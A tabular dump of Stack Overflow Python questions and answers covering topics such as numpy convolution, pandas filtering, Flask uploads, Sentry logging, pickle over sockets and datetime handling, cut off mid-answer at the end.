title stringlengths 10 172 | question_id int64 469 40.1M | question_body stringlengths 22 48.2k | question_score int64 -44 5.52k | question_date stringlengths 20 20 | answer_id int64 497 40.1M | answer_body stringlengths 18 33.9k | answer_score int64 -38 8.38k | answer_date stringlengths 20 20 | tags listlengths 1 5 |
|---|---|---|---|---|---|---|---|---|---|
App Engine serving old version intermittently | 38,741,327 | <p>I've deployed a new version which contains just one image replacement. After migrating traffic (100%) to the new version I can see that only this version now has active instances. However 2 days later and App engine is still intermittently serving the old image. So I assume the previous version. When I ping the domain I can see that the latest version has one IP address and the old version has another.</p>
<p>My question is how do I force App Engine to only server the new version? I'm not using traffic splitting either.</p>
<p>Any help would be much appreciated</p>
<p>Regards,
Danny</p>
| 0 | 2016-08-03T10:43:17Z | 38,788,820 | <p>You have multiple layers of caches beyond memcache, </p>
<p>Googles edge cache will definitely cache static content especially if you app is referenced by your domain and not appspot.com . </p>
<p>You will probably need to use some cache busting techniques. </p>
<p>You can test this by requesting the url that is presenting old content with the same url but appending something like ?x=1 to the url. </p>
<p>If you then get current content then the edge cache is your problem and therefore the need to use cache busting techniques.</p>
| 0 | 2016-08-05T12:03:52Z | [
"python",
"google-app-engine"
] |
Efficient convolution of two images along one axis | 38,741,395 | <p>I have two large grayscale images. Either PIL.Image or numpy data structure. </p>
<p>How do I do 1d convolution of the two images along one axis? </p>
<p>The best I come up with is</p>
<pre><code>def conv2(im1, im2, *args):
res = 0
for l1, l2 in zip(im1, im2):
res += np.convolve(l1, l2, *args)
return res
</code></pre>
<p>Which works, but not extremely fast. Is there a faster way?</p>
<p>Please note that all the 2D convolution functions are probably not relevant since I am not interested in a 2D convolution. I've seen this question on SO before, but I didn't see a better answer than my code. So I'm bumping it again.</p>
| 0 | 2016-08-03T10:46:36Z | 38,741,470 | <p>FFT along one axis, multiply along one axis and inverse FFT.
Should be MUCH faster according to <a href="http://www.dspguide.com/ch18/2.htm" rel="nofollow">this explanation</a>
Scipy.signal.fftconvolve should do the job.</p>
| 2 | 2016-08-03T10:49:50Z | [
"python",
"numpy"
] |
What happens during a Jupyter notebook evaluation? | 38,741,451 | <p>I've always thought that Jupyter simply printed out the <code>repr</code> of an object, but that is not the case.</p>
<p>Here is an example. If I evaluate this in a notebook:</p>
<pre><code>obj = type(2)
obj
</code></pre>
<p>I just get: <code>int</code>.</p>
<p>If I do instead</p>
<pre><code>print(obj)
</code></pre>
<p>I get: <code><class 'int'></code>.</p>
<p>So: what is the Python instruction to simulate what the notebook does during the evaluation of a variable?</p>
| 0 | 2016-08-03T10:48:47Z | 38,745,682 | <p>Jupyter/IPython uses a rather complex <a href="https://github.com/ipython/ipython/blob/master/IPython/lib/pretty.py" rel="nofollow">pretty printer</a>. Concerning your example of <code>int</code>, it has a <a href="https://github.com/ipython/ipython/blob/master/IPython/lib/pretty.py#L668" rel="nofollow">printer for classes/type</a>.</p>
<p>Basically what it does is it gets the class' name via <code>cls.__qualname__</code> (py3) or <code>cls.__name__</code> (py2&3) and the module via <code>cls.__module__</code>, and prints them as <code><module.name></code>. For builtins, the module name is silently ignored.</p>
| 1 | 2016-08-03T13:55:35Z | [
"python",
"jupyter-notebook"
] |
Create JSON tree with unknown root | 38,741,507 | <p>I have the following data created from a minimum spanning tree algorithm:</p>
<pre><code>links = [("Earl","Bob"),("Bob","Sam"),("Bob","Leroy"),("Leroy","Harry")]
</code></pre>
<p>I need to convert the data into the following json tree:</p>
<pre><code>{
"id": "Earl",
"name": "Earl",
"children": [
{
"id": "Bob",
"name": "Bob",
"children": [
{
"id": "Leroy",
"name": "Leroy",
"children": [
{
"id": "Harry",
"name": "Harry"
}
]
},
{
"id": "Sam",
"name": "Sam"
}
]
}
]
}
</code></pre>
<p>I have the following script which works except that it adds a root node called 'Root' to the tree which I do not want:</p>
<pre><code>import json
links = [("Earl","Bob"),("Bob","Sam"),("Bob","Leroy"),("Leroy","Harry")]
parents, children = zip(*links)
root_nodes = {x for x in parents if x not in children}
for node in root_nodes:
links.append(('Root', node))
def get_nodes(node):
d = {}
d['id'] = node
d['name'] = node
children = get_children(node)
if children:
d['children'] = [get_nodes(child) for child in children]
return d
def get_children(node):
return [x[1] for x in links if x[0] == node]
tree = get_nodes('Root')
print(json.dumps(tree, indent=2))
### output below ###
{
"children": [
{
"children": [
{
"children": [
{
"id": "Sam",
"name": "Sam"
},
{
"children": [
{
"id": "Harry",
"name": "Harry"
}
],
"id": "Leroy",
"name": "Leroy"
}
],
"id": "Bob",
"name": "Bob"
}
],
"id": "Earl",
"name": "Earl"
}
],
"id": "Root",
"name": "Root"
}
</code></pre>
<p>What I need is to not add a fake 'Root' as the root node. The root should simply be any existing node in <code>links</code> which does not have a parent (as per the first json example). In other words, the root of the tree doesn't necessarily have to be Earl, it can be any of the nodes which do not have parents. The tree can then start expanding from there.</p>
<p>Perhaps there's a better algorithm for doing this instead of trying to modify this?</p>
| 0 | 2016-08-03T10:51:31Z | 38,741,619 | <pre><code>tree = get_nodes('Root');
tree = tree.children[0];
print(json.dumps(tree, indent=2));
</code></pre>
| -1 | 2016-08-03T10:56:36Z | [
"python",
"json",
"minimum-spanning-tree"
] |
Create JSON tree with unknown root | 38,741,507 | <p>I have the following data created from a minimum spanning tree algorithm:</p>
<pre><code>links = [("Earl","Bob"),("Bob","Sam"),("Bob","Leroy"),("Leroy","Harry")]
</code></pre>
<p>I need to convert the data into the following json tree:</p>
<pre><code>{
"id": "Earl",
"name": "Earl",
"children": [
{
"id": "Bob",
"name": "Bob",
"children": [
{
"id": "Leroy",
"name": "Leroy",
"children": [
{
"id": "Harry",
"name": "Harry"
}
]
},
{
"id": "Sam",
"name": "Sam"
}
]
}
]
}
</code></pre>
<p>I have the following script which works except that it adds a root node called 'Root' to the tree which I do not want:</p>
<pre><code>import json
links = [("Earl","Bob"),("Bob","Sam"),("Bob","Leroy"),("Leroy","Harry")]
parents, children = zip(*links)
root_nodes = {x for x in parents if x not in children}
for node in root_nodes:
links.append(('Root', node))
def get_nodes(node):
d = {}
d['id'] = node
d['name'] = node
children = get_children(node)
if children:
d['children'] = [get_nodes(child) for child in children]
return d
def get_children(node):
return [x[1] for x in links if x[0] == node]
tree = get_nodes('Root')
print(json.dumps(tree, indent=2))
### output below ###
{
"children": [
{
"children": [
{
"children": [
{
"id": "Sam",
"name": "Sam"
},
{
"children": [
{
"id": "Harry",
"name": "Harry"
}
],
"id": "Leroy",
"name": "Leroy"
}
],
"id": "Bob",
"name": "Bob"
}
],
"id": "Earl",
"name": "Earl"
}
],
"id": "Root",
"name": "Root"
}
</code></pre>
<p>What I need is to not add a fake 'Root' as the root node. The root should simply be any existing node in <code>links</code> which does not have a parent (as per the first json example). In other words, the root of the tree doesn't necessarily have to be Earl, it can be any of the nodes which do not have parents. The tree can then start expanding from there.</p>
<p>Perhaps there's a better algorithm for doing this instead of trying to modify this?</p>
| 0 | 2016-08-03T10:51:31Z | 38,741,774 | <p>Isn't this because you've added Earl as a child of Root? With:</p>
<pre><code>links.append(('Root', node))
print links # [('Earl', 'Bob'), ('Bob', 'Sam'), ('Bob', 'Leroy'), ('Leroy', 'Harry'), ('Root', 'Earl')]
</code></pre>
<p>So now when you run <code>children = get_children(node)</code> for <code>node = 'Root'</code>, you'll get <code>True</code>.</p>
| -1 | 2016-08-03T11:03:25Z | [
"python",
"json",
"minimum-spanning-tree"
] |
How do I get the values of pixels in a certain area? | 38,741,551 | <p>so since I am relatively new to programming I would need a little help with that problem.
I am using SimpleCV with Python 2.7 on a Windows Computer.
What I am trying to do is to get a (selfwritten) program to tell me the values of the pixels along a preset line, the most important thing here would be the color of each pixel.</p>
<p>I don't really know where to start since I only found examples where it was asked for the values of a single pixel. </p>
<p>What would probably also be important to know is that I don't want to do that with a picture but with a live video made with a webcame and the preset line will be the radius of an object I will track with the webcame.</p>
<p>So to sum it up: I want to track an object with my webcam and need a program to tell me the color (in numbers, so for example "255" for white) of each pixel along he radius line of the tracked object.</p>
<p>This is a prewritten code I am currently using for obejct tracking:</p>
<pre><code>print __doc__
import SimpleCV
display = SimpleCV.Display()
cam = SimpleCV.Camera()
normaldisplay = True
while display.isNotDone():
if display.mouseRight:
normaldisplay = not(normaldisplay)
print "Display Mode:", "Normal" if normaldisplay else "Segmented"
img = cam.getImage().flipHorizontal()
dist = img.colorDistance(SimpleCV.Color.BLACK).dilate(2)
segmented = dist.stretch(200,255)
blobs = segmented.findBlobs()
if blobs:
circles = blobs.filter([b.isCircle(0.2) for b in blobs])
if circles:
img.drawCircle((circles[-1].x, circles[-1].y), circles[-1].radius(),SimpleCV.Color.BLUE,3)
if normaldisplay:
img.show()
else:
segmented.show()
</code></pre>
<p><a href="http://i.stack.imgur.com/AGpIe.jpg" rel="nofollow">here is a snapshot of the tracked object</a></p>
<p>I need the pixels color along the radius because I want to know how the light intensity decreases going from the center to the rim.</p>
<p>Does anybody maybe have an idea how to approach this problem?
Thank you!</p>
| 2 | 2016-08-03T10:53:22Z | 38,750,457 | <p>Let's say you have the center <code>(x0, y0)</code>. You want to iterate over the pixels on the radius going from <code>(x0, y0)</code> to <code>(x1, y1)</code> which is a point on the circle. </p>
<p>In C++, you would be able to use the <a href="http://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html#lineiterator" rel="nofollow">LineIterator</a> for that purpose. However, I didn't find it for python...</p>
<p>So you can either implement your own LineIterator in Python (or take <a href="http://stackoverflow.com/questions/32328179/opencv-3-0-python-lineiterator">the one made by a nice StackOverFlow contributor</a>) or you could resort to a hideous hack if performance is not a critical issue in your application:</p>
<ul>
<li>Create a black binary mask the size of your image</li>
<li>Draw your line on this mask</li>
<li>Find all non-black pixels using <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.nonzero.html" rel="nofollow">NumPy nonzero function</a>.</li>
<li>You've got the pixels of your line (though they are not ordered)</li>
<li>Order them according to their distance from the center.</li>
</ul>
<p>I reckon that just taking the line iterator I linked to on another StackOverflow question is still the easiest way for you.</p>
| 0 | 2016-08-03T17:47:33Z | [
"python",
"windows",
"opencv",
"tracking",
"simplecv"
] |
Sentry django configuration - logger | 38,741,620 | <p>I am trying to use simple logging and want to send errors/exceptions to Sentry.</p>
<p>I configured the Sentry as per the document and run the test successfully on my dev(<code>python manage.py raven test</code>)</p>
<p>I added the Logging configuration as in <a href="https://docs.getsentry.com/hosted/clients/python/integrations/django/" rel="nofollow">Sentry documentation</a> to a Django settings</p>
<p>When I put this code in my View, then it doesn't work at all</p>
<pre><code>import logging
logger = logging.getLogger(__name__)
logger.error('There was an error, with a stacktrace!', extra={
'stack': True,
})
</code></pre>
<p>Maybe I am missing something </p>
<p>Thanks for the help</p>
<pre><code>LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'root': {
'level': 'WARNING',
'handlers': ['sentry'],
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s '
'%(process)d %(thread)d %(message)s'
},
},
'handlers': {
'sentry': {
'level': 'ERROR', # To capture more than ERROR, change to WARNING, INFO, etc.
'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
'tags': {'custom-tag': 'x'},
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
}
},
'loggers': {
'django.db.backends': {
'level': 'ERROR',
'handlers': ['console'],
'propagate': False,
},
'raven': {
'level': 'DEBUG',
'handlers': ['console'],
'propagate': False,
},
'sentry.errors': {
'level': 'DEBUG',
'handlers': ['console'],
'propagate': False,
},
},
}
</code></pre>
| 1 | 2016-08-03T10:56:38Z | 38,751,038 | <p>When you call <code>logger = logging.getLogger(__name__)</code> Django <a href="https://docs.djangoproject.com/ja/1.9/topics/logging/#naming-loggers" rel="nofollow">creates a new logger</a>.</p>
<p>One option is that if you want to log directly to only Sentry, you could use:</p>
<pre><code>logger = logging.getLogger('sentry.errors')
</code></pre>
<p>There are many other configurations for loggers as well as inheritance for loggers on that page in the documentation. </p>
| 0 | 2016-08-03T18:23:19Z | [
"python",
"django",
"logging",
"sentry"
] |
Saving file from post request using Flask only works locally | 38,741,699 | <p><strong>HMTL:</strong></p>
<pre><code><form action="/uploadimage" method="post" enctype="multipart/form-data">
<input type="file" name="file"><br>
<input type="submit" value="Submit">
</form>
</code></pre>
<p><strong>Python (Flask):</strong></p>
<pre><code>@app.route('/uploadimage')
def saveImage():
if request.method == 'POST':
imfile = request.files['file']
imfile.save('static/images/myimage.jpg')
# also tried imfile.save('static/images/','myimage.jpg')
</code></pre>
<p>This seems to work fine on my local machine.</p>
<p>When I push my code to the remote repository on Openshift.com, it seems to cause problems. </p>
<p>I can't seem to find the error, I'm not getting any useful feedback from the logs.</p>
<p>Any idea why this might be the case?</p>
| 1 | 2016-08-03T11:00:09Z | 38,741,854 | <p>Openshift have <code>data</code> and that <code>directory can be used for persistent storage</code> | <code><a href="https://developers.openshift.com/managing-your-applications/filesystem.html" rel="nofollow">filesystem</a></code></p>
<p>You can get the directory using this environment variable <code>OPENSHIFT_DATA_DIR</code></p>
<p>And please save your file over there... </p>
| 1 | 2016-08-03T11:06:59Z | [
"python",
"file",
"flask",
"openshift"
] |
Optimal way for finding 'greatest value less than' in Numpy array | 38,741,718 | <p>I have a sorted numpy array <code>X</code> and also two constants <code>k</code> and <code>delta</code> that are not in <code>X</code>. I would like to find the index corresponding to, the largest value in <code>X</code> less than or equal to <code>k</code> and the value must be within <code>delta</code> of <code>k</code> i.e. I want</p>
<pre><code>max {i | k - delta <= X[i] <= k } (1)
</code></pre>
<p>Note this set may be empty in which case I will return <code>None</code>. The way I'm doing it I currently feel is unoptimal as it doesn't take advantage of the fact <code>X</code> is ordered at the first step</p>
<pre><code># Get the max from the set of indices in X satisfying (1)
idx = np.where((k-delta <= X) * (X <= k))[0].max()
</code></pre>
<p>I'm not sure how clever Numpy can be when doing this as it doesn't already know <code>X</code> is sorted hence the <code>(k-delta <= X) * (X <= k))</code> will I assume take longer than necessary. Note we can use the <code>.max()</code> as we know ourselves the array is sorted.</p>
<p>What would be a more optimal way of doing this?</p>
| 2 | 2016-08-03T11:00:53Z | 38,741,916 | <p><a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.argmax.html" rel="nofollow"><code>Numpy.argmax</code></a> could be usefull for taking advantage of the sorted list.</p>
<pre><code>import numpy as np
np.argmax(X <= k) if k-d < np.argmax(X <= k) < k+d else None
</code></pre>
| 0 | 2016-08-03T11:11:06Z | [
"python",
"arrays",
"performance",
"sorting",
"numpy"
] |
Optimal way for finding 'greatest value less than' in Numpy array | 38,741,718 | <p>I have a sorted numpy array <code>X</code> and also two constants <code>k</code> and <code>delta</code> that are not in <code>X</code>. I would like to find the index corresponding to, the largest value in <code>X</code> less than or equal to <code>k</code> and the value must be within <code>delta</code> of <code>k</code> i.e. I want</p>
<pre><code>max {i | k - delta <= X[i] <= k } (1)
</code></pre>
<p>Note this set may be empty in which case I will return <code>None</code>. The way I'm doing it I currently feel is unoptimal as it doesn't take advantage of the fact <code>X</code> is ordered at the first step</p>
<pre><code># Get the max from the set of indices in X satisfying (1)
idx = np.where((k-delta <= X) * (X <= k))[0].max()
</code></pre>
<p>I'm not sure how clever Numpy can be when doing this as it doesn't already know <code>X</code> is sorted hence the <code>(k-delta <= X) * (X <= k))</code> will I assume take longer than necessary. Note we can use the <code>.max()</code> as we know ourselves the array is sorted.</p>
<p>What would be a more optimal way of doing this?</p>
| 2 | 2016-08-03T11:00:53Z | 38,742,146 | <p>One efficient approach to leverage the sorted order would be with <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.searchsorted.html" rel="nofollow"><code>np.searchsorted</code></a> -</p>
<pre><code>def largest_within_delta(X, k, delta):
right_idx = X.searchsorted(k,'right')-1
if (k - X[right_idx]) <= delta:
return right_idx
else:
return None
</code></pre>
<p>Sample runs to cover various scenarios -</p>
<pre><code>In [216]: X
Out[216]: array([ 8, 9, 33, 35, 36, 37, 44, 45, 71, 81])
In [217]: largest_within_delta(X, 36, 0) # this k is already in array
Out[217]: 4
In [218]: largest_within_delta(X, 36, 1) # shouldn't choose for next one 37
Out[218]: 4
In [220]: largest_within_delta(X, 40, 3) # Gets 37's index
Out[220]: 5
In [221]: largest_within_delta(X, 40, 2) # Out of 37's reach
</code></pre>
<p><strong>Runtime test</strong></p>
<pre><code>In [212]: # Inputs
...: X = np.unique(np.random.randint(0,1000000,(10000)))
...: k = 50000
...: delta = 100
...:
In [213]: %timeit np.where((k-delta <= X) * (X <= k))[0].max()
10000 loops, best of 3: 44.6 µs per loop
In [214]: %timeit largest_within_delta(X, k, delta)
100000 loops, best of 3: 3.22 µs per loop
</code></pre>
| 2 | 2016-08-03T11:21:35Z | [
"python",
"arrays",
"performance",
"sorting",
"numpy"
] |
Delete row in column when value in column is a string | 38,741,814 | <p>I have the following dataframe:</p>
<pre><code> MATERIAL KW_WERT NETTO_EURO TA
0 B60ETS 0.15 18.9 SDH
1 B60ETS 0.145 18.27 SDH
2 B60ETS 0.145 18.27 SDH
3 B60ETS 0.15 18.9 SDH
4 B60ETS 0.15 18.9 SDH
5 B60ETS 0.145 18.27 SDH
6 B60ETS 0.15 18.9 SDH
7 B60ETS 3.011 252.92 DSLAM/MSAN
8 B60ETS 3.412 429.91 DSLAM/MSAN
9 B60ETS 0.9 113.4 DSLAM/MSAN
10 B60ETS 0.281 23.6 DSLAM/MSAN
11 B60ETS 0.078 9.83 DSLAM/MSAN
12 B60ETS 0.107 13.48 DSLAM/MSAN
13 B60ETS 0.192 KW DSLAM/MSAN
14 B60ETS 0.007 KW PSTN
15 G230ETS 0.3 46.05 SONSTIGES
</code></pre>
<p>how can I filter for the datatype (string) in the column <code>NETTO_EURO</code> an delete it?</p>
<p>The point is that the basic data I get includes some errors and I cant sum up the columns with a string data in it. Now is the first solution to delete the row. Later I will try to fix it otherwise.</p>
<p>Thank you for your help.</p>
<p>Damian</p>
| 1 | 2016-08-03T11:05:03Z | 38,741,853 | <p>You can use mask with <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.to_numeric.html" rel="nofollow"><code>to_numeric</code></a> and <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.notnull.html" rel="nofollow"><code>notnull</code></a> with <a href="http://pandas.pydata.org/pandas-docs/stable/indexing.html#boolean-indexing" rel="nofollow"><code>boolean indexing</code></a>:</p>
<pre><code>print (pd.to_numeric(df.NETTO_EURO, errors='coerce').notnull())
0 True
1 True
2 True
3 True
4 True
5 True
6 True
7 True
8 True
9 True
10 True
11 True
12 True
13 False
14 False
15 True
Name: NETTO_EURO, dtype: bool
print (df[pd.to_numeric(df.NETTO_EURO, errors='coerce').notnull()])
MATERIAL KW_WERT NETTO_EURO TA
0 B60ETS 0.150 18.9 SDH
1 B60ETS 0.145 18.27 SDH
2 B60ETS 0.145 18.27 SDH
3 B60ETS 0.150 18.9 SDH
4 B60ETS 0.150 18.9 SDH
5 B60ETS 0.145 18.27 SDH
6 B60ETS 0.150 18.9 SDH
7 B60ETS 3.011 252.92 DSLAM/MSAN
8 B60ETS 3.412 429.91 DSLAM/MSAN
9 B60ETS 0.900 113.4 DSLAM/MSAN
10 B60ETS 0.281 23.6 DSLAM/MSAN
11 B60ETS 0.078 9.83 DSLAM/MSAN
12 B60ETS 0.107 13.48 DSLAM/MSAN
15 G230ETS 0.300 46.05 SONSTIGES
</code></pre>
<p>If has old version of pandas use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.convert_objects.html" rel="nofollow"><code>convert_objects</code></a>:</p>
<pre><code>print (df[df["NETTO_EURO"].convert_objects(convert_numeric=True).notnull()])
MATERIAL KW_WERT NETTO_EURO TA
0 B60ETS 0.150 18.9 SDH
1 B60ETS 0.145 18.27 SDH
2 B60ETS 0.145 18.27 SDH
3 B60ETS 0.150 18.9 SDH
4 B60ETS 0.150 18.9 SDH
5 B60ETS 0.145 18.27 SDH
6 B60ETS 0.150 18.9 SDH
7 B60ETS 3.011 252.92 DSLAM/MSAN
8 B60ETS 3.412 429.91 DSLAM/MSAN
9 B60ETS 0.900 113.4 DSLAM/MSAN
10 B60ETS 0.281 23.6 DSLAM/MSAN
11 B60ETS 0.078 9.83 DSLAM/MSAN
12 B60ETS 0.107 13.48 DSLAM/MSAN
15 G230ETS 0.300 46.05 SONSTIGES
</code></pre>
| 1 | 2016-08-03T11:06:50Z | [
"python",
"python-3.x",
"pandas"
] |
Pickle Key error "Y" using socket | 38,741,884 | <p>I am trying to send a dictionary to my client and it is fin on the server end but when it gets to unpickling the dictionary it comes up with error <code>KeyError: 'Y'</code>. </p>
<p>Why?</p>
<p>Here is my code:</p>
<p>client.py:</p>
<pre><code>import socket, pickle
s = socket.socket()
s.connect(("localhost", 10000))
def userDump():
s.sendall("userdump")
d = s.recv(1024)
return pickle.loads(d)
print userDump()
s.close()
</code></pre>
<p>server.py:</p>
<pre><code>import pickle, socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
address = 'localhost'
port = 10000
s.bind((address, port))
s.listen(5)
while True:
c, clientaddress = s.accept()
c.send("You're Connected")
d = c.recv(1024)
if d == "userdump":
u = {"hello":"hi", "hi":"hello"}
print u
c.send(pickle.dumps(u))
c.close()
</code></pre>
| 0 | 2016-08-03T11:08:59Z | 38,742,013 | <p>It certainly doesn't help that the "You're connected" message is being concatenated with the pickle in your client. Removing that <code>send</code> from the server code appears to make your program work correctly.</p>
| 1 | 2016-08-03T11:15:12Z | [
"python",
"sockets",
"pickle"
] |
Pickle Key error "Y" using socket | 38,741,884 | <p>I am trying to send a dictionary to my client and it is fin on the server end but when it gets to unpickling the dictionary it comes up with error <code>KeyError: 'Y'</code>. </p>
<p>Why?</p>
<p>Here is my code:</p>
<p>client.py:</p>
<pre><code>import socket, pickle
s = socket.socket()
s.connect(("localhost", 10000))
def userDump():
s.sendall("userdump")
d = s.recv(1024)
return pickle.loads(d)
print userDump()
s.close()
</code></pre>
<p>server.py:</p>
<pre><code>import pickle, socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
address = 'localhost'
port = 10000
s.bind((address, port))
s.listen(5)
while True:
c, clientaddress = s.accept()
c.send("You're Connected")
d = c.recv(1024)
if d == "userdump":
u = {"hello":"hi", "hi":"hello"}
print u
c.send(pickle.dumps(u))
c.close()
</code></pre>
| 0 | 2016-08-03T11:08:59Z | 38,742,034 | <p>The pickle protocol is version dependent. Could it be that you use different Python / pickle versions on client and server? In that case select a low protocol version explicitly as explained in the <a href="https://docs.python.org/3.5/library/pickle.html" rel="nofollow">docs</a>.</p>
<p>Alternatively use JSON or something called <a href="https://pypi.python.org/pypi/Pyro4" rel="nofollow">Pyro</a></p>
<p>(O, and, indeed, first make the correction suggested by holdenweb...)</p>
| -1 | 2016-08-03T11:16:29Z | [
"python",
"sockets",
"pickle"
] |
Pickle Key error "Y" using socket | 38,741,884 | <p>I am trying to send a dictionary to my client and it is fin on the server end but when it gets to unpickling the dictionary it comes up with error <code>KeyError: 'Y'</code>. </p>
<p>Why?</p>
<p>Here is my code:</p>
<p>client.py:</p>
<pre><code>import socket, pickle
s = socket.socket()
s.connect(("localhost", 10000))
def userDump():
s.sendall("userdump")
d = s.recv(1024)
return pickle.loads(d)
print userDump()
s.close()
</code></pre>
<p>server.py:</p>
<pre><code>import pickle, socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
address = 'localhost'
port = 10000
s.bind((address, port))
s.listen(5)
while True:
c, clientaddress = s.accept()
c.send("You're Connected")
d = c.recv(1024)
if d == "userdump":
u = {"hello":"hi", "hi":"hello"}
print u
c.send(pickle.dumps(u))
c.close()
</code></pre>
| 0 | 2016-08-03T11:08:59Z | 38,742,153 | <p>Your function <code>userDump()</code> should be corrected as:</p>
<pre><code>def userDump():
d = s.recv(1024)
s.sendall("userdump")
d = s.recv(1024)
return pickle.loads(d)
</code></pre>
<p>In your code you receive <code>"You're Connected"</code> in <code>d</code> and you are trying to unpickle it.</p>
| 0 | 2016-08-03T11:21:59Z | [
"python",
"sockets",
"pickle"
] |
Calculating the frequency of each row in Pandas DataFrame | 38,741,914 | <p>Suppose I have given datasets:</p>
<pre><code>Sr.No|Query
-----
1. a
2. a
3. b
4. b
5. a
</code></pre>
<p>I want the following result :</p>
<pre><code>Sr.No | Query | Frequency
1. a 3
2. a 3
3. b 2
4. b 2
5. a 3
</code></pre>
<p>Please note that the duplicates should not be removed.</p>
| 3 | 2016-08-03T11:10:53Z | 38,741,972 | <p>You can use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.core.groupby.GroupBy.transform.html" rel="nofollow"><code>transform</code></a> with <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.core.groupby.GroupBy.size.html" rel="nofollow"><code>size</code></a>:</p>
<pre><code>df['Frequency']= df.groupby('Query')['Query'].transform('size')
print (df)
Sr.No Query Frequency
0 1.0 a 3
1 2.0 a 3
2 3.0 b 2
3 4.0 b 2
4 5.0 a 3
</code></pre>
| 1 | 2016-08-03T11:13:27Z | [
"python",
"pandas",
"dataframe"
] |
How to convert data of type Panda to Panda.Dataframe? | 38,741,952 | <p>I have a object of which type is Panda and the print(object) is giving below output</p>
<pre><code> print(type(recomen_total))
print(recomen_total)
</code></pre>
<p>Output is </p>
<pre><code><class 'pandas.core.frame.Pandas'>
Pandas(Index=12, instrument_1='XXXXXX', instrument_2='XXXX', trade_strategy='XXX', earliest_timestamp='2016-08-02T10:00:00+0530', latest_timestamp='2016-08-02T10:00:00+0530', xy_signal_count=1)
</code></pre>
<p>I want to convert this obejct in pd.DataFrame, how i can do it ?</p>
<p>i tried pd.DataFrame(object), from_dict also , they are throwing error </p>
| 0 | 2016-08-03T11:12:35Z | 38,742,968 | <p>Interestingly, it will not convert to a dataframe directly but to a series. Once this is converted to a series use the to_frame method of series to convert it to a DataFrame</p>
<pre><code>import pandas as pd
df = pd.DataFrame({'col1': [1, 2], 'col2': [0.1, 0.2]},
index=['a', 'b'])
for row in df.itertuples():
print(pd.Series(row).to_frame())
</code></pre>
<p>Hope this helps!!</p>
<h1>EDIT</h1>
<p>In case you want to save the column names use the _asdict() method like this:</p>
<pre><code>import pandas as pd
df = pd.DataFrame({'col1': [1, 2], 'col2': [0.1, 0.2]},
index=['a', 'b'])
for row in df.itertuples():
d = dict(row._asdict())
print(pd.Series(d).to_frame())
Output:
0
Index a
col1 1
col2 0.1
0
Index b
col1 2
col2 0.2
</code></pre>
| 0 | 2016-08-03T11:57:17Z | [
"python",
"pandas",
"dataframe"
] |
Update date in Python | 38,742,028 | <p>so here is my problem, I am trying to do a little program that gives the user the next date when he will have to pay rent.</p>
<p>Here is my code:</p>
<pre><code>curdate = datetime.date(2015, 01, 01)
rent_date = datetime.date(curdate.year, curdate.month+1, 01)
one_day = datetime.timedelta(days = 1)
one_week = datetime.timedelta(weeks = 1)
one_month = datetime.timedelta(weeks = 4)
def rent_date_calc(cd, rd):
if cd.month == 12:
rd.replace(cd.year+1, 01, 01)
else:
rd.replace(cd.year, cd.month+1, 01)
def time_pass(rd, cd, a, al):
if rd < cd:
for a in al:
a.finances -= a.rent
move_fwd = raw_input("Would you like to move forward one day(1), one week (2) or one month (3)?")
if move_fwd == "1":
curdate += one_day
elif move_fwd == "2":
curdate += one_week
else:
curdate += one_month
time_pass(rent_date, curdate, prodcomp, prodcomps)
rent_date_calc(curdate, rent_date)
print "Rent date: " + str(rent_date)
</code></pre>
<p>The problem I have is that rent_date always stays the same (2015-02-01)
Any idea why?</p>
| 1 | 2016-08-03T11:16:07Z | 38,742,144 | <p>Your code is not altering anything because datetime is an immutable object, and when you call replace on it, it returns a new datetime, instead of modifying the first one.</p>
<p>You should <code>return</code> the new object from the function and <code>assign</code> it back to <code>rent_date</code>:</p>
<pre><code>def rent_date_calc(cd, rd):
if cd.month == 12:
return rd.replace(cd.year+1, 01, 01)
else:
return rd.replace(cd.year, cd.month+1, 01)
...
rent_date = rent_date_calc(curdate, rent_date)
</code></pre>
| 1 | 2016-08-03T11:21:34Z | [
"python"
] |
Update date in Python | 38,742,028 | <p>so here is my problem, I am trying to do a little program that gives the user the next date when he will have to pay rent.</p>
<p>Here is my code:</p>
<pre><code>curdate = datetime.date(2015, 01, 01)
rent_date = datetime.date(curdate.year, curdate.month+1, 01)
one_day = datetime.timedelta(days = 1)
one_week = datetime.timedelta(weeks = 1)
one_month = datetime.timedelta(weeks = 4)
def rent_date_calc(cd, rd):
if cd.month == 12:
rd.replace(cd.year+1, 01, 01)
else:
rd.replace(cd.year, cd.month+1, 01)
def time_pass(rd, cd, a, al):
if rd < cd:
for a in al:
a.finances -= a.rent
move_fwd = raw_input("Would you like to move forward one day(1), one week (2) or one month (3)?")
if move_fwd == "1":
curdate += one_day
elif move_fwd == "2":
curdate += one_week
else:
curdate += one_month
time_pass(rent_date, curdate, prodcomp, prodcomps)
rent_date_calc(curdate, rent_date)
print "Rent date: " + str(rent_date)
</code></pre>
<p>The problem I have is that rent_date always stays the same (2015-02-01)
Any idea why?</p>
| 1 | 2016-08-03T11:16:07Z | 38,742,424 | <p><strong>Your functions have to return a new rent date.</strong> You just need to add the following lines in your code:</p>
<ul>
<li><strong><em>return cd</em></strong></li>
<li><strong><em>new_rent_date = rent_date_calc(curdate, rent_date)</em></strong></li>
</ul>
<p>====================================================================</p>
<pre><code>curdate = datetime.date(2015, 1, 1)
rent_date = datetime.date(curdate.year, curdate.month+1, 1)
one_day = datetime.timedelta(days = 1)
one_week = datetime.timedelta(weeks = 1)
one_month = datetime.timedelta(weeks = 4)
def rent_date_calc(cd, rd):
if cd.month == 12:
new_date = rd.replace(cd.year+1, 1, 1)
else:
